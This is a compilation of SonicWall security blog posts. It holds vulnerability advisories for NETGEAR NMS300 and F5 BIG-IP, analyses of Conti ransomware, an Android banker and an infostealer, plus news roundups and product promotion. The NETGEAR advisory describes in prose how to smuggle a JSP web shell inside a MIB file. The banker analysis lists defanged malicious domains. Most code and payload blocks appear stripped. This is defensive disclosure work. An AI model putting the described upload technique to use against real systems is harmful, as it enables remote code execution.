NETGEAR ProSAFE NMS MFileUploadController Vulnerability


  Netgear ProSAFE Network Management System NMS300 is a centralized and comprehensive management application for network administrators that enables them to discover, monitor, configure, and report on SNMP based enterprise-class network devices. The Netgear Network Management System NMS300 delivers insights into the network, including third-party devices and its web-based user interface makes it easier to monitor and administer an entire network.

  This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System Authentication is not required to exploit this vulnerability. The specific flaw exists within the MFileUploadController class. The issue results from the lack of proper validation of a user-supplied path, prior to use in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-27274.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Attack Packet Overview:

  The Content-Type header line contains the following:

    • “multipart/form-data” – Data is in multiple parts. Defining separated parts by the boundary keyword.
    • “boundary=” – Separating keyword or sequence of characters.

  The Content-Disposition header line contains the following:

    • “form-data”
    • “name=” – name of form element being returned.
    • “filename=” – Suggested file name to be used if detached and stored in a separate file.


Technical Overview:

  A user with the “observer” privilege can manage the MIB config files via the “mib browser” page in the NMS300 web interface to upload a MIB config file. A request to the Request-URI “/lib-1.0/external/flash/” will be sent to the server to upload a MIB config file.

  The MIB file content is transferred in a multipart/form-data part within the HTTP message body, and the filename parameter within the Content-Disposition header specifies the name of the file. The uploaded file will be saved into the following directory:


  Where the “Install_Dir” is where the NMS300 is installed, and the “filename” is the filename parameter within the Content-Disposition header in the multipart/form-data part. The “type_dir” and “sub_dir” are derived from mapping the value of the type and sub request parameters to various sub-directory names. This mapping is specified in the file “” which has the following contents:


  For example, if the type parameter value is “mib”, the “type_dir” is “WEB-INF/mibs/Customized/”; if the sub parameter value is “4”, the “sub-dir” is “Switch/”. Therefore, the nms300_mibpath for the uploaded MIB file in the above example is:


  If type and sub parameters are omitted or contain empty value, the “type_dir” is assigned as the string “null” and the “sub_dir” is assigned as the empty string “” in the application. Therefore, the nms300_mibpath for the uploaded MIB file will be a string as below:


  An unrestricted file upload vulnerability exists in the NETGEAR Management System NMS300. The vulnerability is due to a failure to validate the file type of the uploaded file. When the server receives the HTTP POST request with Request-URI containing “/lib-1.0/external/flash/”, the method uploadFile() in MFileUploadController class is executed. This method retrieves the values from the type, sub, and filename parameters in the request and then uses them to build the nms300_mibpath for the uploaded MIB file. Then, the uploadFile() method writes the uploaded file content into the nms300_mibpath. Then, the uploadFile() will call the parseNewMIB() method of the MibLoader class to parse the uploaded MIB file. If the uploaded file is not in the format of a MIB config file, the
parseNewMIB() will throw exceptions and cause uploadFile() to delete this uploaded MIB file

  However, the uploadFile() does not sanitize the filename parameter for dangerous file extension type. Also, it does not validate the type and sub parameter. If type and sub parameters are omitted or contain empty value, an attacker can upload a malicious JSP file with the filename parameter like “poc.jsp” and then the file will be saved in a nms300_mibpath as below:


  Because uploadFile() will delete the uploaded file if it is not a MIB config file, the attacker must try to pass this checking. The attacker can achieve it by embedding the malicious JSP code inside the comment lines of a normal MIB config file, as shown in the example below:


  Where the comment line starts with “–” and the JSP codes follows. This makes the uploaded JSP file kept on the server without being deleted. Later, due to the files under the directory “/Install_Dir/apache-tomcat-6.0.33/webapps/ROOT/” can be remotely accessed without any restriction via HTTP requests, the attacker can submit a subsequent request with an URL as below:


    and get the uploaded JSP file executed on the target server, which can cause arbitrary code execution.

  Note that, beginning from NMS300 version, authentication has already been required to access the URI “/lib-1.0/external/flash/”. Therefore, in general, an attacker must authenticate to the server to exploit this vulnerability. Unauthenticated attack can only be applied to servers older than version

  A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must authenticate to the target system.

Triggering Conditions:

  The attacker authenticates and then sends an HTTP request containing crafted parameters to upload a malicious file to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8080/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS 15572: NETGEAR ProSAFE MFileUploadController Arbitrary File Creation

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
    Vendor Advisory

Cybersecurity News & Trends

This week, healthcare was under attack in the U.S. and abroad, as facilities reported outages and blackmail demands.

SonicWall in the News

Discord is now the young hacker’s weapon of choice — here’s why — tom’s guide
“Discord is the potential future of the dark net,” said Brook Chelmo, a senior strategist for SonicWall, during his recent RSA session.

Fish out the Phishing attacks — Security Middle East & Africa
“The best defense against most credential harvesting attacks is the use of a password manager,” SonicWall’s Mohamed Abdallah said. “Most are free, and none can be fooled into entering a password into a malicious site, no matter how authentic it seems.”

Industry News

As Chips Shrink, Rowhammer Attacks Get Harder to Stop — Ars Technica
A full fix for the “Half-Double” technique will require rethinking how memory semiconductors are designed.

Rise in Opportunistic Hacks and Info-Sharing Imperil Industrial Networks — Dark Reading
Security researchers have seen an increasing wave of relatively simplistic attacks involving ICS systems (and attackers sharing their finds with one another) since 2020.

Alleged North Korean hackers scouted crypto exchange employees before stealing currency — Cyberscoop
Suspected North Korean hackers have breached cryptocurrency exchanges in Japan, Europe, the U.S. and Israel in an effort to steal millions of dollars from the platforms in the last three years.

Ransomware: Two-thirds of organisations say they’ll take action to boost their defences — ZDNet
The impact of the Colonial Pipeline ransomware attack is leading companies to re-examine their cybersecurity strategies.

New Zealand Hospitals Under Prolonged IT Outage From Ransom Hack — Bloomberg
Systems are still down a week after a ransomware attack disrupted the IT network of five hospitals in the New Zealand district of Waikato, and concerns remain that private patient information may have been exposed.

Iranian hacking group targets Israel with wiper disguised as ransomware — Bleeping Computer
An Iranian hacking group has been observed camouflaging destructive attacks against Israeli targets as ransomware attacks. Meanwhile, they’re maintaining access to victims’ networks for months.

Gartner: Global Security Spending Will Reach $150 Billion in 2021 — Security Week
Gartner says nearly half (roughly $72 billion) will be spent on security services, including consulting, hardware support, and implementation and outsourced services.

Hear ye, DarkSide! This honorable ransomware court is now in session — Ars Technica
A crime forum is holding a quasi-judicial proceeding against the makers of DarkSide to hear claims from former affiliates who say the makers skipped town without paying.

FBI identifies 16 Conti ransomware attacks striking US healthcare, first responders — ZDNet
The targets identified include 911 dispatch carriers, law enforcement agencies and emergency medical services — all of which have been attacked over the past year as medical services struggled to manage the pandemic.

Vulnerability in VMware product has severity rating of 9.8 out of 10 — Ars Technica
The security flaw, which VMware disclosed and patched on Tuesday, resides in the vCenter Server, one of the most popular virtualization solutions on the market.

Cyber insurance premiums, take-up rates surge, says GAO — ZDNet
A General Accountability Office report finds that cyber insurance premiums surged in 2020 based on more frequent cyberattacks. That trend is likely to continue.

Zeppelin ransomware comes back to life with updated versions — Bleeping Computer
The developers of Zeppelin ransomware have resumed activity after a period of relative silence that started last fall.

This massive phishing campaign delivers password-stealing malware disguised as ransomware — ZDNet
Java-based STRRAT malware creates a backdoor into infected machines — but distracts victims by acting like ransomware.

Bizarro banking malware targets 70 banks in Europe and South America — Bleeping Computer
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

E-commerce giant suffers major data breach in Codecov incident — Bleeping Computer
E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack.

QNAP confirms Qlocker ransomware used HBS backdoor account — Bleeping Computer
QNAP is advising customers to update the HBS 3 disaster recovery app. The goal: to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.

In Case You Missed It

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape — Brook Chelmo
Join us for the 2021 SonicWall Partner Virtual Roadshow — David Bankemper
Capture Client 3.6 Launch Brings Key Features — Brook Chelmo
Using Client VPN with Your Firewall for WFH: a Setup for Disaster? — Jean-Pier Talbot
Triple Threat: CRN’s 2021 Women of the Channel List Honors SonicWall Leaders — Lindsey Lockhart

Conti operator demands $20M from victim. Faces litigation backlash instead

The SonicWall Capture Labs threat research team have recently been tracking Conti ransomware. It has been reported that Conti has been connected with over 400 cyberattacks against organizations around the world. In addition to encrypting files and holding them hostage for ransom, attackers attempt to increase chances of payout by threatening to publish sensitive data that is stolen from company networks. Such double-extortion schemes are a growing trend with ransomware.


Infection Cycle:


Conti ransomware is aimed at large company networks. The initial infection is handled manually by the attackers and would usually start with phishing attempts or firewall exploits. Once inside a network, a Cobalt Strike beacon is introduced onto the system to communicate with the attacker’s C2 server. Once the backdoors are established, the attackers propogate malware further within the network and begin to exfiltrate sensitive data that will be used later on for extortion.  After this, Conti malware is deployed.


Conti malware uses the following icon:


Upon infection, files on the system are encrypted.  Each encrypted file is given a .FEEDC extension.  A file named readme.txt is dropped into directories containing encrypted files.  It contains the following message: is down but the tOr link leads to the following page:


After uploading readme.txt to the tOr website, the following conversation can be seen between a prior victim and the operator.



As seen in the message above, the operator demands a staggering $20M for file decryption.


After a few days, the victim fights back with litigation:


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Conti.RSM (Trojan)
  • GAV: Conti.RSM_2 (Trojan)
  • GAV: Conti.RSM_3 (Trojan)
  • GAV: Conti.RSM_4 (Trojan)
  • GAV: Cobaltstrike.A_1 (Trojan)
  • GAV: Cobaltstrike.A_2 (Trojan)
  • GAV: Cobaltstrike.A_3 (Trojan)
  • GAV: Cobaltstrike.A_4 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Infiltrate, Adapt, Repeat: A Look at Tomorrow’s Malware Landscape

What would you think if I told you that malware attacks are down, but new variants of malware are up? According to the SonicWall 2021 Cyber Threat Report, malware attacks are down from their high three years ago, showing an overall drop of 43% in 2020. Despite that sounding like great news, SonicWall found a 73% increase in new and updated strains of malware that couldn’t have been caught by traditional defenses that rely on static definitions.

With the way things are going, we expect this trend to continue in the near future. But why is this happening — and what does it mean? I believe the threat landscapes is as active as it is because of many new entrants to the game and faster development.

New Entrants

In my research for my RSA talk on how the youngest generation is learning to hack, I found that the TV show Mr. Robot has created many fans who all want to learn how to hack. These youngsters are approaching the subject at a young age and have more resources available to them when compared to previous generations. There are many safe places for them to test their skills, like “Hack the Box,” but over time they want to test new skills on real companies. The more responsible ones will offer to do penetration testing, while others may go into malware development and attacking.

Almost all new entrants into the game are looking to build something and see what they can get past our defenses. Almost all of those that I interviewed over the last year are getting into ransomware, which could explain why SonicWall saw a 62% rise in this malware type in 2020. The strains they are building are becoming so advanced that it scares me. They have moved from idolizing fictional characters to becoming the real attackers. In the case of Hildacrypt, they have moved from making their own version of Petya to driving to create a strain modeling the tactics of the crew that developed SamSam ransomware.

Faster Development

Other bands of people will join fellow attackers to create ransomware and other forms of malware with different modules (e.g. malicious bootloaders, runners, decrypters, etc.) and test it on real-world subjects. After a round of attacks, they will go to VirusTotal to see if anyone has identified their strain. After discovery, they will make changes to the code, ensuring any files used hash differently (hashing a file is how a computer identifies a file). They’ll also improve a strain’s performance to make it more effective.

After this, the next attack launches, and the cycle repeats itself. For instance, WannaCry had numerous versions come out within the initial weeks of the first major attacks. While VirusTotal isn’t the end-all for malware detection, since it’s the most notable, attackers will frequently check to see when their strains are registered, which takes around two to three days before they must switch gears. With that information, they will build in new evasion tactics based on who found them first and work backwards as they build versions 2, 3, 4, etc.

Over time, these malware developers may transition from project to project, bringing their expertise and experience with them when developing a new strain of malware with a new team. When they struggle to build a module themselves or have issues troubleshooting a problem, there is an active and cheap marketplace with customer service available to help fill in the gaps. Today, it is easier to get paid through ransomware and then pay for help developing code thanks to cryptocurrencies. So, for the foreseeable future, you can expect to see more people getting into malware development, with many new variants on the horizon.

Stopping Malware of the Future

The storyline behind advanced persistent threats goes far beyond ransomware. The other hot ticket is, and always has been, the exfiltration of data from corporate sources. I have always said that the best way to set your IT security budget is to ask yourself, “What is the value of my data to an attacker?” A lot of us overly protect data that is of little use to an attacker yet leave some essential data less guarded because it means less to us. Our customers’ data and intellectual data are two of the things we typically protect first.

When developing your philosophy on upgrading your network protection, we typically start at the network, then look at connections, then the endpoint itself, and then its path to the cloud.

Without giving away the whole story now, we typically start with the inspection of traffic coming into the network. With 70% of sessions today being encrypted, we also take a hard look at inspecting that traffic as well. Next, we will look to how we inspect for unknown malware that can’t be found by a traditional next-generation firewall. Sandboxing engines have been around since 2011, and they have evolved to look for malware across multiple engines — including within the memory of the system, since this is where a lot of attacks (such as fileless attacks) try to initiate to hide how they got into the network and remain undetected and undeterred by security software.

Would you believe that customers use Capture ATP with Real-Time Deep Memory Inspection (RTDMI) to find between 1,400 to 1,600 new forms of malware every business day, many of these with numerous evasion tactics?

SonicWall has been in IT security for 30 years now, and we have seen it all. We have morphed from a firewall company into a security platform company. We famously stopped WannaCry in its tracks on our customer’s networks three weeks before the first major attack was ever noted. We have found and named several new strains throughout our research and continue to develop new and better technologies to help you discover and stop unknown, zero-day and updated attacks on your own network.


F5 BIG-IP iControl remote command execution vulnerability

SonicWall Capture Labs threat research team observed attacks exploiting vulnerability in F5’s BIG-IP iControl API.


F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI for F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability | CVE-2021-22986
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following URL:


BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability. This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control pane. Exploitation can lead to complete system compromise. An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted request to the vulnerable REST interface. Due to insufficient validation in login requests to the REST API the attacker is able to successfully bypass authentication .

After bypassing the authentication, a remote attacker can use multiple vectors to execute commands on the target
server as shown below:

The following JSON payload would execute the “id” command on the underlying operating system:

The following versions are vulnerable :

    • versions 16.0.x before
    • 15.1.x before
    • 14.1.x before 14.1.4
    • 13.1.x before
    • 12.1.x before
    • BIG-IQ 7.1.0.x before and 7.0.0.x before

This vulnerability is patched . The vendor advisory is here 

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 15471:F5 BIG-IP iControl REST Remote Command Execution 1
    • IPS 15472:F5 BIG-IP iControl REST Remote Command Execution 2
    • IPS 15473:F5 BIG-IP iControl REST Remote Command Execution 3

Threat Graph

Android banker with hardcoded financial targets

SonicWall Threats Research Team received reports of an Android banker campaign that has a multitude of features and commands at its disposal. Samples we analyzed include hardcoded financial institutions whose presence is monitored and fake login pages are shown if these targeted apps are found running on the device.

Sample Details

  • MD5:  9d050ee9d306fa2228b3ddb1840bfb61
  • Application Name: OLX
  • Package Name: man.cube.ship

Infection Cycle

Among the permissions requested, the following are a few sensitive/dangerous ones:

  • android.permission.BIND_ACCESSIBILITY_SERVICE
  • android.permission.CALL_PHONE
  • android.permission.GET_TASKS
  • android.permission.READ_SMS
  • android.permission.REAL_GET_TASKS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.WRITE_SETTINGS


Upon installation and execution, the malware does not show any screens or interface o any kind but continues to perform malicious actions in the background:

The Manifest.xml file points to a Main Activity class that gets invoked when the application runs, but this class is not see in the code base once decompiled:

This indicates that there is a possibility that a dex file containing the actual deobfuscated code is dropped when the application executes. We observe a file getting dropped in the app_DynamicOptDex folder on the device where the app gets installed. The file ZTpqTR.json is actually a DEX file that contains legible malicious code

Observations from the code

Interesting elements are present in a class file which can be considered as the configuration file. as it contains a number of hardcoded elements:

Server that the malware communicates with:

  • http://ro-37[.]in/myaccount/login[.]php

A number of domains marked as Gates:

  • http://analkarnavalbubenec[.]pw/3lfk3jGj/
  • http://karambga3j[.]net/3lfk3jGj/
  • http://lkrishtian1[.]com/3lfk3jGj/
  • http://lkrishtifaa[.]com/3lfk3jGj/

A list of financial applications that the malware targets along with what looks like fake login pages uploaded on a domain (which has been taken down as of writing this blog), complete file can be viewed here


The malware has capabilities to accept the following commands and execute the corresponding functionalities:

  • registration
  • send_sms
  • sms_contact
  • sms_contacts
  • get_push
  • tracker
  • move_sms_client
  • mard_mode – spelling mistake for hard mode
  • call_number
  • startes_access


Network activity

The malware communicated with the following domains during our analysis:

  • ro-27[.]in
  • lkrishtifaa[.]com


The following VirusTotal graph can be seen for this apk:


Banker Targets

The malware targets a number of financial institutions, notable targets include:

  • AlfaBank – Commercial bank in Russia
  • OpenBank – An online bank, headquartered in Madrid
  • Tinkoff – Russian bank based in Moscow
  • VTB24 – Leading universal bank of Russia
  • Mbank – Banking group in Poland
  • HomeCredit – An international non-bank financial institution headquartered in Netherlands


SonicWall Capture Labs provides protection against this threat via the following signature:

  • AndroidOS.Banker.DR_1


Indicators of compromise (IOC):

  • 9d050ee9d306fa2228b3ddb1840bfb61

Join us for the 2021 SonicWall Partner Virtual Roadshow

As a company 100% committed to the channel, SonicWall takes pride in the opportunities we offer our partners — and we’re especially excited to bring you our upcoming SonicWall SecureFirst Partner Virtual Roadshow, June 15-17.

This year’s Roadshow will offer helpful workshops covering sales positioning, opportunity identification and other valuable training to enhance your partner experience, along with the ability to interact with your regional teams in an open forum.

But our latest products and advancements will be at the center of this year’s Roadshow. During the event, we’ll be focusing on all new SonicWall product updates, including Gen 7, plus offering an advance look at future product updates.

Best of all, attendees can take advantage of hands-on demos of some of our newest SonicWall solutions, designed to help you secure your customers in a work reality where everyone is remote, mobile and unsecure.

Here’s a sampling of the products that will be on display:

The new SonicWall NSa 3700 Next-Generation Firewall (NGFW)

The SonicWall Network Security Appliance (NSa) 3700 next-generation firewall (NGFW) offers medium and large enterprises industry-leading performance at the lowest total cost of ownership in its class. In addition to its ability to scale to support millions of connections, it can also scan these connections for threats over multi-gigabit speeds without compromising performance. The NSa 3700 simplifies management, even when dealing with multiple networks and clouds.

We’ll also be showcasing exciting new updates to SonicWall WNM, SonicWall NGA and SonicWall NSM.

SonicWall Wireless Network Manager WNM 3.5 is a cloud-based wireless network management system that simplifies access-point deployment, management and monitoring. WNM is fully integrated with Capture Security Center, providing seamless integration with MySonicWall and Licensing.

SonicWall Analytics NG – NGA 3.0 is a powerful, intelligence-driven analytics service, designed to give you a direct line of sight into the security posture of your network and users in real time, all through a single pane of glass.

SonicWall Network Security Manager (NSM) 2.2, a multi-tenant centralized firewall manager, allows you to centrally manage all firewall operations error-free by adhering to auditable workflows. This versatile solution comes in both on-prem and SaaS versions to fit your unique network needs.

If you’re interested in attending an upcoming virtual roadshow event in North America, check out the table below for available events and register for one near you:

Date Eastern Time Pacific Time Region Attendee Reg Link
June 15 10:30am – Noon 7:30am – 9am Q2 2021 Roadshow – Northeast Register Now
June 15 1:30pm – 3pm 10:30am – 12pm Q2 2021 Roadshow – Central US Register Now
June 16 10:30am – Noon 7:30am – 9am Q2 2021 Roadshow – Southeast Register Now
June 16 1:30pm – 3pm 10:30am – 12pm Q2 2021 Roadshow – Canada Register Now
June 16 4:30pm – 6pm 1:30pm – 3pm Q2 2021 Roadshow – California Register Now
June 17 10:30am – Noon 7:30am – 9am Q2 2021 Roadshow – Midwest/Mid-Atlantic Register Now
June 17 1:30pm – 3pm 10:30am – 12pm Q2 2021 Roadshow – West US Register Now

For More News …

If you aren’t already, follow our dedicated partner-focused account @SNWLSecChannel on Twitter.

You can also follow us on Twitter and Facebook for the latest SonicWall news.


Cybersecurity News & Trends

This week the DarkSide ransomware group dominated the headlines, launching additional attacks, bringing in large quantities of Bitcoin and (hopefully) being shut down for good.

SonicWall in the News

‘It’s a battle, it’s warfare’: experts seek to defeat ransomware attackers — Financial Times

  • Financial Times reporter Hannah Murphy references SonicWall data as she explores the lucrative industry of ransomware.

Breaking into New Technology with Partners — Channel Pro Network

  • MiradorIT cites its partnership with ASCII member Net Sciences for enabling it “to move into advanced cybersecurity by offering high-availability SonicWall deployments.”

Windows 10 has a built-in ransomware block, you just need to enable it — PC Gamer

  • Turns out there is a mechanism in Windows Defender that can help protect your files from ransomware. PC Gamer leverages SonicWall data to educate readers.
    *Syndicated: PC Gamer – UK

D&H Defies Pandemic: Grows U.S. Sales 19 Percent, Breaks $5B Barrier — CRN

  • D&H Distributing, the 104-year-old, employee-owned SMB distribution stalwart, helped its partners power through the global pandemic — and in the process, posted a whopping 160% increase in cloud sales for the fiscal year.

Industry News

The Full Story of the Stunning RSA Hack Can Finally Be Told — Wired

  • In 2011, Chinese spies stole the crown jewels of cybersecurity — stripping protections from firms and government agencies worldwide.

Denial of Electricity Service Could Become Next Geopolitical Weapon — The Wall Street Journal

  • With electricity expected to account for a large share of the world’s energy use by 2050, the stakes are high.

Colonial Pipeline CEO: Paying DarkSide ransom was the ‘right thing to do for the country’ — ZDNet

  • The chief executive of Colonial Pipeline has defended paying cybercriminals who launched a devastating attack on the company, calling it the “right thing to do for the country.”

School districts struggle to defend against rising ransomware attacks — The Hill

  • Cybercriminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down Colonial Pipeline earlier this month.

Bizarro banking Trojan surges across Europe — ZDNet

  • Operators have targeted customers of at least 70 banks across Europe and South America so far.

Chemical distributor pays $4.4 million to DarkSide ransomware — Bleeping Computer

  • Chemical distribution company Brenntag paid a $4.4 million ransom to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

Legislation to secure critical systems against cyberattacks moves forward in the House — The Hill

  • Multiple bills meant to secure critical infrastructure against cyberthreats were approved by the House Homeland Security Committee — just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation.

New Zealand hospitals infected by ransomware, cancel some surgeries — The Register

  • New Zealand’s Waikato District Health Board has been hit with ransomware that took down most IT services and drastically reduced services at six of its affiliate hospitals.

Hackers scan for vulnerable devices minutes after bug disclosure — Bleeping Computer

  • Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

Supply chain hacking attacks: Government eyes new rules to tighten security — ZDNet

  • The UK might soon require managed IT service providers to undergo extra cybersecurity checks.

‘Catastrophic’ cyberattack larger than pipeline hack increasingly likely, acting CISA chief says — The Washington Times

  • A top U.S government official said it is increasingly likely the federal government will be faced with a “catastrophic cyber incident” larger in scope than the recent Colonial Pipeline hack.

After just 9 months, Darkside ransomware gang brings in $90 million in Bitcoin — ZDNet

  • The cryptocurrency was sourced from 47 different wallets, according to research from Elliptic.

Insurer AXA hit by ransomware after dropping support for ransom payments — Bleeping Computer

  • Branches of insurance giant AXA based in Thailand, Malaysia, Hong Kong and the Philippines have been struck by a ransomware cyberattack, with 3 TB of sensitive data stolen from AXA’s Asian operations.

DarkSide ransomware servers reportedly seized, REvil restricts targets — Bleeping Computer

  • The DarkSide ransomware operation has allegedly shut down, after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

Toshiba unit struck by DarkSide ransomware group — ZDNet

  • Following Colonial Pipeline, a DarkSide affiliate has claimed another victim.

In Case You Missed It

Capture Client 3.6 Launch Brings Key Features

We’re pleased to announce the SonicWall Capture Client 3.6 release, which offers our customers the addition of three key features.

First of all, it will allow users using MacOS to update their systems to Big Sur thanks to the new Kextless agent. It also includes some of the latest SentinelOne features via the addition of the SentinelOne 4.6 agent, which includes enhanced threat and device management, as well as a number of bug fixes. Furthermore, this release allows those who were previously on 3.1 to upgrade to the latest client and take advantage of the features that were initially offered for our MSSP customers in the 3.5 release.

For those of you who are not aware of the previously released 3.5 features, here’s a quick summary:

We’ve made some major improvements to the user experience by making multi-tenant management easier. Now you can quickly create, configure and enforce global policies and compliance based on user group, device and location. We’ve made it easier to create and deploy new tenants through the adoption of global baseline policies, while also offering the flexibility to build and deploy custom policies for specific tenants.

We added something we call Scope of Operations (or, simply put, “Scope”), which allows administrators to granularly pick their context of visibility and control. For example, you can immediately push agents out to all tenants or roll out in batches to better control field issues. You can also quickly add new security definitions to all tenants via the inheritance feature within global policies. The same would go for amending content filtering policies on the fly across all your tenants.

The features that are unlocked in 3.6 offer a better dashboard, enabling greater visibility into endpoint devices. The quick health snapshot offers a look at all tenants, displaying infections, vulnerabilities and active devices across one or multiple tenants. You can also view what content is accessed, what is blocked, and which web pages or users cause the most alerts.

This isn’t a comprehensive list of everything that went into the Capture Client 3.5 release — for more information, please read the blog.

What do you need to do to get on board with Capture Client 3.6? Just read this knowledgebase article on our Release of Capture Client 3.6, and all will be clear!

In the meantime, I invite you to read our solution brief, “A Unified-Client Platform for Enterprise-Grade Endpoint Security,” which is designed to help people understand how we are addressing the problems and threats facing the endpoint as people work from the office and their homes.

Multistage infostealer wants your Discord, Telegram, Steam Account Info

The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. If available on the victim’s machine, this Trojan steals various cryptocurrency data, credit card info, ftp server info and credentials on Discord, Telegram, Pidgin, Steam, NordVPN and Authy (2FA) accounts. It also steals the browser history and even takes a screenshot of the desktop.

Infection Cycle:

The malware infection starts with a malicious Microsoft Excel spreadsheet file that has an embedded visual basic (VBA) macro that when executed will download a Trojan downloader.

This downloader then drops a batch file which then runs a slew of commands.

It has the functionality to add a user to the active directory.

It also  invokes powershell to run a script which downloads the main infostealer Trojan. The powershell script is encoded that when decoded shows the download URL.

To ensure persistence, it adds the infostealer Trojan to startup.

All these components files are deleted after the main infostealer has been downloaded.

Once the main infostealer is executed it creates a directory under the %Temp% folder with a random name where it logs all stolen information.

It creates a sqlite file which has the information on credit card available on the system.

It saves a png file of the screenshot of the victim’s desktop.

It also creates a file which has the list of all recently visited websites and another file which has the list of the rest of stolen information on various cryptocurrencies, popular chat app accounts like Discord, Pidgin and Telegram, VPN and FTP servers, as well as account info on popular cloud-based gaming library, like Steam.

All these log files are then deleted once they have been sent out to remote server.

During analysis we noted that this “Collector Project” (which was one of the logs’ title) indicated that this is BETA BUILD v1.11 which might suggest that this has been an ongoing project for these cybercriminals and that we can expect to see this again and other variants in the future with more features and capabilities.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Panda.B (Trojan)
  • GAV: Panda.K (Trojan)
  • GAV: Panda.STL (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.